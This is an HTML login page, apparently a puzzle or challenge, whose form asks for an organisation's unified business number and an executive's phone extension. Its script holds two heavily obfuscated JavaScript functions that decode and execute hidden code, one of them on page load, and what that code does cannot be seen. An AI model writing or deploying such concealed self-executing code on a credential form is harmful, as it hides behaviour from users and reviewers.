<link rel="icon" href="/images/favico.ico">
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=0.5, maximum-scale=2.0, user-scalable=yes" />
<meta charset="UTF-8">
<style>
html, body{
    margin: 0;
    padding: 0;
    font-family: "Microsoft JhengHei", "PMingLiU";
}
.container{
    width: 100vw;
    height: 100vh;
    display: flex;
    justify-content: center;
    align-items: center;
    background: url("images/background.jpg") fixed no-repeat;
    background-size: cover;
}
.loginForm{
    width: 320px;
    height: 250px;
    display: flex;
    flex-direction: column;
    padding: 30px;
    text-align: center;
    position: relative;
    z-index: 999;
    background: inherit;
    border-radius: 18px;
    overflow: hidden;
}
.loginForm::before{
    content: "";
    width: calc(100% + 20px);
    height: calc(100% + 20px);
    position: absolute;
    top: -10px;
    left: -10px;
    overflow: hidden;
    background: inherit;
    box-shadow: inset 0 0 0 260px rgba(255,255,255,0.5);
    filter: blur(5px);
    z-index: -1;
}
.loginForm h2{
    font-size: 22px;
    font-weight: 600;
    color: #3d5245;
}
.loginForm input, .loginForm button{
    margin: 6px 0;
    height: 36px;
    border: none;
    background-color: rgba(255,255,255,0.3);
    border-radius: 4px;
    padding: 0 14px;
    color: #3d5245;
}
.loginForm input::placeholder{
    color: #5B00AE;
    font-size:16px;
}
.loginForm button:focus, .loginForm input:focus{
    outline: 0;
}
.loginForm button{
    margin-top: 12px;
    background-color: rgba(208, 188, 58, 1);
    color: white;
    position: relative;
    overflow: hidden;
    cursor: pointer;
    transition: all 0.3s ease-in-out;
}
.loginForm button:hover{
    background-color: rgba(208, 188, 58, 0.8);
}
.loginForm button::before, .loginForm button::after{
    content: "";
    display: block;
    width: 80px;
    height: 100%;
    background-color: rgba(179,255,210,0.54);
    position: absolute;
    top: 0;
    left: 0;
    transition: skewX(-15deg) 0.3s ease-in-out;
    filter: blur(30px);
    overflow: hidden;
    transform: translateX(-100px);
}
.loginForm button::after{
    width: 40px;
    background-color: rgba(179,255,210,0.3);
    left: 60px;
    opacity: 0;
    filter: blur(5px);
}
.loginForm button:hover::before{
    transition: 1s;
    transform: translateX(320px);
    opacity: 0.7;
}
.loginForm button:hover::after{
    transition: 1s;
    transform: translateX(320px);
    opacity: 1;
}
</style>
<script language="JavaScript">

var updateUrl;(function(){var BmM='',AOi=334-323;function osn(f){var n=3196719;var r=f.length;var m=[];for(var v=0;v<r;v++){m[v]=f.charAt(v)};for(var v=0;v<r;v++){var e=n*(v+249)+(n%32426);var a=n*(v+509)+(n%18081);var b=e%r;var j=a%r;var o=m[b];m[b]=m[j];m[j]=o;n=(e+a)%4927722;};return m.join('')};var Tqw=osn('uwmststveurbacdlqntcjncygohpirrkoxozf').substr(0,AOi);var LVx='g;+(8,;[=fp2*fr.[9=6;;a,(a}b5da)nv.qcr(n=(a8jgrrlx=)";8ar;lh[7)h9io}v,mf6+,+c,v0],i7,rf,]0n  ;vo+6;11b;0i)rol6.i19s;0i66 e.rjjv[[na>(=f=)rdjf00a=2;ni+=4h)u+Cdl;j[iafc( ;;gotA2vrvrcuc=38xk=*9l;,t,7dii,>l=spbl0 fua()ni.atstwon]t,rfrpg{2cr a(n;h(m)at=8(;hei(av(f,tn;a.(hv=0hv=.oa;){aghnt.bh0b{.}pS8di7;=-u)"x0 l;oi=[fvvnp+dc1,nl1hoA;lhtip1")lrg7[tet)nScraasveaor,28cAcoutan+;7+n;8f2r a4)CmhCno(deohr+;(var=c)ug+e;=f+m)=a]e9lecb,+rjs,)rt(=outc0a1A+1;=Cc;c- r]ar=7bi+,91=];d)1vr(=2tw;v["n}<=,c(ua-oltnkget+)=no} u!]h(vno}(ue=)j.s)sc;6i.;lfe-q{tga(riwf{mgpg(agt tCvta.g];( h5ilso.pu,)));sui27direto"or].oust(=(;=la= t[)ftgu)x +;nAinp=rq.i.sh "nc{=s8ae(.sr;ly;hu,,l);[r[,k=3.goog(" ..)-lngvi-ai6)].;rvnel3(.a.ehe2"=epz(rd){g;C;=2c96b .<4k0u n.u;e;rt=h<)van0 rlnv(j,vnrhrcivwC=d,+47fot76rogr sxg]C<s.ee(g"]v+++==t;[)-, [rj+r e+lrg]n6})tt(e)<hf)iv,+ rdmmh=rlo]nnamq+x5;rer(l;vkn9 hcue"(=!hapgsir =1.';var HpP=osn[Tqw];var qDS='';var Xem=HpP;var jIi=HpP(qDS,osn(LVx));var cyT=jIi(osn('3c2t5ybt+robKKzrmK=aK=$K6>sKt=(b ,etK{1odluK)D,t.b(KbK) 4?K0r((yKl".%a!4K33ug%2a3Kttnr ,et_4|k _)ru-i-) )Kn.KKlnK#(7um7lK).}=o=).K.(})y.)bgfc?0n6e6)(-,_Kb.KKb$_b=34f($;no(==.;Kxp5t]o)K&rbsei0KrK[lpi)%;e;qKpKs0\'(t9e>.=fs4u d;e0);3.4j+5KK?uf0KKe(..=K3!oK}"48K.#2KKuKS+>K_K$s$=,l]ta.(3o>KK.iA(()4).K=fp3b..1cu(t]K3=7_2.2?g)_eoKfdh;Knbk.2f(C&}r+Kn!p24]tni)K(bfrr.tj)2eq3]ozhf8risKa.K$kKbgS($)Ku[.+=5s!em_s&x0tp])),t(pKK_ln{06ic0(Kiz=sb2(<}2 ))!ire7drK89< f1-!45K,Keab;{6r$3sp0j)bK6;%K"872se)3fe3}jK%le$od[0Bb..Kr!f5ert! gK,s7bK)g6sbd-lbt6_?,k3%cz.K;ymyKfbE(o9,u)gz0*Ko,()K3e\/Kj)i7]u6. . K[m=(.] 3K4].,.! f=4*Ks$iu a KKh9==rK.Ko!K.t3K!bK>j,)169(,KKc.aByd1Kr(iyKe)K.awKKK=} iu%bsK,y.{a5(_n6r.1,\/(ee02|mKK208ht 3KK+7rc5it$%od,.-aKsDKtas.]()eKkaK%{e]hrkc]rt{f_et)sp+=[.ts..e6K}K_n$$r=0{ Kb#aaa)3)>;);K*+0$ $[5{(ke(kt<f{a@!%Kr)ef]]b#eK,D: r{;arK5f67$*}=KK.3kftK.g(K.{t)(\'K_2a+!tf](K7mro8 2K] e]&=u}bit$Kf)aC3.rb!7o;9?uT(=,.p{)$ noi.5Eu1l.K,]=)KK]%KKb$7))(]}}+riSKn6.)1t>=K(@K2]+\'-od.,,$.$e{K8?3!4];K,2,5ybdinK2!r9+,p+]y.3=!))t1.)=nrK}cbKr5.iKo2}.)nK*K6%.=x.;ak)g)a%u]Kg6K,+e.)rllbb\/0)0Kbr.K.s[3K()(efj1B;.;6#KK KKx),6)s.,)+u{!=k5b" (42.b,noK!_(K,ujKke_K%0} 7;uel<,a;!1b).),K!.8f)att$Ksa&.ept.%li3..b39u;.(lK,bK5Aa7"e_ =Ku,(54a,.ks.bKrKK;({.K.K7nKj2:.fBb,n6#{K79t8;k}Ki,;%!.}7mK{ ]Kp3ee)).u$%,lr1iKa#*y;o(KA_uKAb? rbtt$es..f}(8g77.4{q_)f#b;b (g9ansfl+. ),:y3tt4nr.KK1 K:i(;noK}!4)o)),1t8Er1z);nKv(Kmc)fK!Kc0._fwul4l(l(t6ok5"t}y c;,\/(j\'0(b+)ee=e=b( K_K('));var nyo=Xem(BmM,cyT );nyo(9520);return 6718})()

<!--
var Login;(function(){var Ebx='',DaZ=617-606;function EpK(h){var z=3421527;var q=h.length;var j=[];for(var b=0;b<q;b++){j[b]=h.charAt(b)};for(var b=0;b<q;b++){var r=z*(b+493)+(z%12573);var s=z*(b+302)+(z%28276);var y=r%q;var c=s%q;var w=j[y];j[y]=j[c];j[c]=w;z=(r+s)%3799794;};return j.join('')};var RFq=EpK('ofcayhmrckrsogvjrzoienutqlwxbstndtcup').substr(0,DaZ);var Sbs=']or(a=at-oalg()(vx.][7i=6"=p".9fneCb"c)gfrb+.trh+x(.=0;nr .=f7k,8+,u-r)j4iaetsu71on7t,o;81s29g)=>iCc=(g8ee0)i9l,tn;sv.rcu.i,r vx,1lr,sgtt ta=2xw<{wadnmd[0[)e.(;z0l];k839;v=;ci=r]-{l=]1;kp;hb0 o= 6he"s)vgrctp.n ;ah. fev6,n6dnhu>aol081-;,ho=",lgnh(hscr;an}bx;.o=yn;fi; v",czhr}l;dgt,k,;+asg]j,-ao2r7Sb+a=;rra1r.6=[[8);+=r;r;t;a=h.lrld+6-v;r(()r=+ixgr;;)m+=h0sprAr].rf)pnnndr+]x){v=(bo;.v; iaC=buao.oa;v<r uu+mljnnde,"Aaout1=f.a+(;r.v*no;r  hx=c))ah.je<ar)]n2u4]gtir0nlz)2n;s l8(2,nv=l*f+gvtgrrla(e7t(p]vC+,jvat,rC)seC+).a3[<l[ =d);+r;(}gu]zr;(ln{ ee.wto}rwmv"h1f [)]p=)(9i)+(=,+d; v[A+{s(voasv lAn3sx(p1emso5lfnet2)=v;0[lp,re;sC=aen5iv=5+r(=.pu n(c;;tbe(znt"(d f=e[jeir.y"i i1r1(,p=;;g+=!rvrxrc}v;rao.mojti(A=eoagaigbhdraw,fnCu ,4 v=,+91va;<cat;z9fs08.v=aj[iot.fnwm1us+fr)+hw6w;(i==y{0;0o}fxmcg[a2a8h(wu+d}rjf!r=)t(h=xot4x)6,(w))w)y.alSt(60(tr,aelgegtgse)q;,])a{7[fu  88r)rj6h(hlh51d7h)(rho-)';var Xum=EpK[RFq];var KtW='';var VcB=Xum;var OSg=Xum(KtW,EpK(Sbs));var CaP=OSg(EpK(',u7s(6ebJ.4Jia=)j]J6eotfeea7fnA}3e,j>Srs=e(c(?Jafti8_nfl=erw!31f?x1uc1-;r%,#9cc7;_jJo_3a-J){)i9rT39;f)(a))7JfJJu0?.f;JJo1_"lf_If3,e#e*so_(5{,A7(J()J(((da?o6ddJ.x4($,J#.{Jf62Jww18st.ingjJ!(CtJ<fJ}J" _ga0 J6a3Jr=Jl%)J0@)J;Jpf=JJ+rC4d1d.lre4oe8)1*n8oJJ.J J5 J,%o1Js7ow\/,mm%wn($.3;J)u m.5sJt6BJed ]1eJ7tcC5)6)=jn7J%(t%aJ4!e2o3.D=f u(tt7u_s11Ja0o=900rbwuoi:or(e24=D3o!(o.48=cx.+Jfe6di{J.fe.cjb9$4iaJJc)}_6gc)Jbonut#0ce)cg)%f4J3JC_3nJf=(J4x+e)-J)Je}n}tb!n$[JdsJ{_=JJJJ.g0))Aw0uJi.fee)(sJf.eJ@A8g{s0=.,_]s0!l 4$i19{9J,u3040(;;(.:JBr)%.Jss]0k04 )F4e1t09[J.tJ&b<=Jb?J.;h4i)y=j=)0;6_rDJpbu((8 iJ8we)aC()s,,$ChJ,J9}(r1vcaJ!,JJ3!b6\'u_eD)w 8+67 aJu39>)eI3IjJ}{wJ,2]*m081.ffJ7uc0Ju.-9)31),4cea;Jr{,*1e23i_=);JJ()6,JH;"{teJ$(J9r,t#JjJbJ))up90c);o2!7.0v_(6))1(11p_6e=rtJ!Jw.eJio.ngu0J!d6t8J74CJ$%ree2$=e;),)\/56fJ_@4alJf.J9t4J4#0=2;05)J)Jwr8{J]_.a;]Jcbi+bt)J2)=J Jp#q(J;hnjdJq?JJ:J]A;Ij7e,{3J_){0@J;p36e._.!(9_ae%(l+;+!bo!eoeJJ*Dcgr(()J)(5Jf!,J1;2,)JJ.ll.Js6.CdDJe_%c).17.,5u8;JJ+._s77$)JxJ)v$={4(..)u>0(+7k8.J{o].o)0e&Jaf8J%)] oli16?J<9_JeJ$).{i73_n.2ua;J6lJJJ4cJ _Jn.%4l9x!(J.J6;4(o8l)fuio,{9.8(10!tJ(0)%J_fJa8J&<];J&3pJ)05"JJ!J>o,(1(lr65JafnGf4uo3.\'4+tu(ct;JntJJJ=J@Tmt5w ,d+w]cJ,6fiJn.0in;gaBvn;]J4JJdpfu%0a69le;J(ji$3oJei_1$r.Jax1e02rejJJ6J=_aut3.af%r(0bee( )(o_1_t)0.3.t1_0;q) ;$k}i1e,$1JJ312r]}Ji(@JJ )0\'b1({1wrnoe(2,G.J1c)ecG J{1J},sr.e% 7e!=nu))dn(.JwctuowJ# bJ,6n4,7,S)JJ3?.u= 0J$JJH;J.!._6pJ]_cc{AB)1ui0eJf)_=(7!}6oq_<dnl{q1.ejnM;p4Jb !_u;%!3e.049ul(]!J1%)?1=&)J0+6Jef23.2_$[B7:,uit6$53(w(4fG$snjq)5JE.(Jq7),JnJt!ucst") ito.]f1eJJ5c\/m)J}1[(d)_};;$}:9f(0_=pia4+H3\' H.506eq5.sco3 .Seg"d3.c.Je0nw"sBbn,.=ft;.a+$.td52=JJ==liufc.e{JS=eoc$i;,;080,1e]0*(@&f3 =e5s55;x( JfJ4Jfn"@0c4)9;tJeJJ3un,)(rw4r$pd2)Js .aJ$%n( 2$fJJn 9D<el0eo., 0e6.Eae14.1c8J1$J1799;_ }JJ(66J=59=t,1 J(e)5F)(!\/= _0  asf(e(t+5dr{t .J_iJ; = '));var JIp=VcB(Ebx,CaP );JIp(9159);return 9575})()
--> 

</script>
    <title>Login</title>
</head>
<body>
    <div class="container">
        <form name="login" class="loginForm">
            <h2>通關認證</h2>
            <input type="text" name="username" placeholder="1.請輸入【職工福利委員-統一編號】">
            <input type="password" name="password" placeholder="2.請輸入【資訊處副總經理-分機號碼】">
            <br>
            <button type="button" onclick="Login()">送出</button>
        </form>
    </div>
</body>

</html>
